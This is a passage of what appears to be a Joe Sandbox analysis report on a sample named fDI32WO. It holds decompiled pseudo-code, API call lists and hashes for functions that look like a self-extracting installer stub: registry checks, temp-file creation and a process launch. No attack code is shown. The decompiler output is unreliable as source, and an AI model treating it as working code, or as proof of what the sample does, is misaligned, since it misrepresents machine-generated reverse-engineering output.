                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E00A824E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A84096,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?), ref: 00A825B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?,00A84096), ref: 00A825CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00A81ED3,00000001,00000000,?,?,00A84137,?,00A84096), ref: 00A825DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A84096,00A84096,?,00A81ED3,00000001,00000000,?,?,00A84137,?), ref: 00A825FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A84096,00000000,00000000,00000000,00000000,?,00A81ED3,00000001,00000000), ref: 00A8261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A825F5
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 00A825A8
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 00A825C3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: 485c7cafb38092b098fa41070055cc46f8ac66848acd4f2cd2ab2e63fd5c2ca0
                                                                                                                                                                                                                                              • Instruction ID: a8046732275fbd10a659d4ec78ea41a6f03202a0f4b6870b7f8ac5a5fe23ece2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 485c7cafb38092b098fa41070055cc46f8ac66848acd4f2cd2ab2e63fd5c2ca0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61114635942128FBAB24FB919C09EFBBF7CEF157A1F504065B809A2011DA345E45E7A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 533 a86a60-a86a91 call a87155 call a87208 GetStartupInfoW 539 a86a93-a86aa2 533->539 540 a86abc-a86abe 539->540 541 a86aa4-a86aa6 539->541 544 a86abf-a86ac5 540->544 542 a86aa8-a86aad 541->542 543 a86aaf-a86aba Sleep 541->543 542->544 543->539 545 a86ad1-a86ad7 544->545 546 a86ac7-a86acf _amsg_exit 544->546 548 a86ad9-a86ae9 call a86c3f 545->548 549 a86b05 545->549 547 a86b0b-a86b11 546->547 550 a86b2e-a86b30 547->550 551 a86b13-a86b24 _initterm 547->551 555 a86aee-a86af2 548->555 549->547 553 a86b3b-a86b42 550->553 554 a86b32-a86b39 550->554 551->550 556 a86b44-a86b51 call a87060 553->556 557 a86b67-a86b71 553->557 554->553 555->547 558 a86af4-a86b00 555->558 556->557 566 a86b53-a86b65 556->566 560 a86b74-a86b79 557->560 561 a86c39-a86c3e call a8724d 558->561 564 a86b7b-a86b7d 560->564 565 a86bc5-a86bc8 560->565 570 a86b7f-a86b81 564->570 571 a86b94-a86b98 564->571 568 a86bca-a86bd3 565->568 569 a86bd6-a86be3 _ismbblead 565->569 566->557 568->569 575 a86be9-a86bed 569->575 576 a86be5-a86be6 569->576 570->565 572 a86b83-a86b85 570->572 573 a86b9a-a86b9e 571->573 574 a86ba0-a86ba2 571->574 572->571 577 a86b87-a86b8a 572->577 578 a86ba3-a86bbc call a82bfb 573->578 574->578 575->560 580 a86c1e-a86c25 575->580 576->575 577->571 581 a86b8c-a86b92 577->581 578->580 586 a86bbe-a86bbf exit 578->586 582 a86c32 580->582 583 a86c27-a86c2d _cexit 580->583 581->572 582->561 583->582 586->565
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E00A87155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0xa872b8);
                                                                                                                                                                                                                                              				E00A87208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0xa888b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0xa888b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0xa881e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0xa888b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E00A86C3F(0xa810b8, 0xa810c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L00A86FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0xa888b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0xa810b4);
                                                                                                                                                                                                                                              							_push(0xa810ac);
                                                                                                                                                                                                                                              							L00A87202();
                                                                                                                                                                                                                                              							 *0xa888b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0xa888ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0xa888b4;
                                                                                                                                                                                                                                              						if( *0xa888b4 != 0 && E00A87060(_t71, 0xa888b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0xa888b4; // 0x0
                                                                                                                                                                                                                                              							 *0xa8a288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
                                                                                                                                                                                                                                              						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t41 =  *_t59;
                                                                                                                                                                                                                                              							if(_t41 > 0x20) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                                                                              										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              										_t41 =  *_t59;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(_t29);
                                                                                                                                                                                                                                              							_t30 = E00A82BFB(0xa80000, 0, _t59); // executed
                                                                                                                                                                                                                                              							 *0xa881e0 = _t30;
                                                                                                                                                                                                                                              							__eflags =  *0xa881f8;
                                                                                                                                                                                                                                              							if( *0xa881f8 == 0) {
                                                                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *0xa881e4;
                                                                                                                                                                                                                                              							if( *0xa881e4 == 0) {
                                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                                              								_t30 =  *0xa881e0; // 0x0
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                              							if(_t41 == 0x22) {
                                                                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                                                                              								_t15 = _t54 == 0;
                                                                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                                                                              								_t54 = 0 | _t15;
                                                                                                                                                                                                                                              								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                                                                              								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                                                                              							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L40:
                                                                                                                                                                                                                                              					return E00A8724D(_t30);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t58 = 1;
                                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a86bea
                                                                                                                                                                                                                                              0x00a86b74
                                                                                                                                                                                                                                              0x00a86c39
                                                                                                                                                                                                                                              0x00a86c3e
                                                                                                                                                                                                                                              0x00a86c3e
                                                                                                                                                                                                                                              0x00a86abe
                                                                                                                                                                                                                                              0x00a86abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A87182
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetCurrentProcessId.KERNEL32 ref: 00A87191
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetCurrentThreadId.KERNEL32 ref: 00A8719A
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetTickCount.KERNEL32 ref: 00A871A3
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: QueryPerformanceCounter.KERNEL32(?), ref: 00A871B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,00A872B8,00000058), ref: 00A86A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00A86AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 00A86AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 00A86B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A86B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 00A86BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 00A86BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: 4e6ee430b50bdd0aaa982cfed7940a2fc7760014be33c56c63f5506919998867
                                                                                                                                                                                                                                              • Instruction ID: 2fa7c6c9fad436d6bef3e96bbfd1187be1fe74d142075cc7546c2088829e2942
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e6ee430b50bdd0aaa982cfed7940a2fc7760014be33c56c63f5506919998867
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D41D2719843249FFB21FBA4DD497AA77F4FB44764F64412AE841E7290DF7888428B81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 587 a858c8-a858d5 588 a858d8-a858dd 587->588 588->588 589 a858df-a858f1 LocalAlloc 588->589 590 a85919-a85959 call a81680 call a8658a CreateFileA LocalFree 589->590 591 a858f3-a85901 call a844b9 589->591 594 a85906-a85910 call a86285 590->594 601 a8595b-a8596c CloseHandle GetFileAttributesA 590->601 591->594 600 a85912-a85918 594->600 601->594 602 a8596e-a85970 601->602 602->594 603 a85972-a8597b 602->603 603->600
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A858C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E00A81680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E00A8658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x00a85974
                                                                                                                                                                                                                                              0x00a8597a
                                                                                                                                                                                                                                              0x00a8597a
                                                                                                                                                                                                                                              0x00a8596c
                                                                                                                                                                                                                                              0x00a858f3
                                                                                                                                                                                                                                              0x00a85901
                                                                                                                                                                                                                                              0x00a85906
                                                                                                                                                                                                                                              0x00a8590b
                                                                                                                                                                                                                                              0x00a85910
                                                                                                                                                                                                                                              0x00a85910
                                                                                                                                                                                                                                              0x00a85918

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A858E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-394614654
                                                                                                                                                                                                                                              • Opcode ID: f83e9eaa383f00d5c1f7280ee59cb1b8c8000b8caa3a05c794947c74530d585d
                                                                                                                                                                                                                                              • Instruction ID: 6f8270a067e115a13eed6e262c72e769384aa7ffb8ff66855d5c9f6f2bdf643a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f83e9eaa383f00d5c1f7280ee59cb1b8c8000b8caa3a05c794947c74530d585d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F110871E0021067D724BFF95C4DB9B7E9DDF45760F100616F945D31D1DB74980687A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 631 a83fef-a84010 632 a8410a-a8411a call a86ce0 631->632 633 a84016-a8403b CreateProcessA 631->633 634 a84041-a8406e WaitForSingleObject GetExitCodeProcess 633->634 635 a840c4-a84101 call a86285 GetLastError FormatMessageA call a844b9 633->635 638 a84070-a84077 634->638 639 a84091 call a8411b 634->639 647 a84106 635->647 638->639 642 a84079-a8407b 638->642 646 a84096-a840b8 CloseHandle * 2 639->646 642->639 645 a8407d-a84089 642->645 645->639 648 a8408b 645->648 649 a84108 646->649 650 a840ba-a840c0 646->650 647->649 648->639 649->632 650->649 651 a840c2 650->651 651->647
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E00A83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E00A86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0xa88a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0xa89a2c; // 0x0
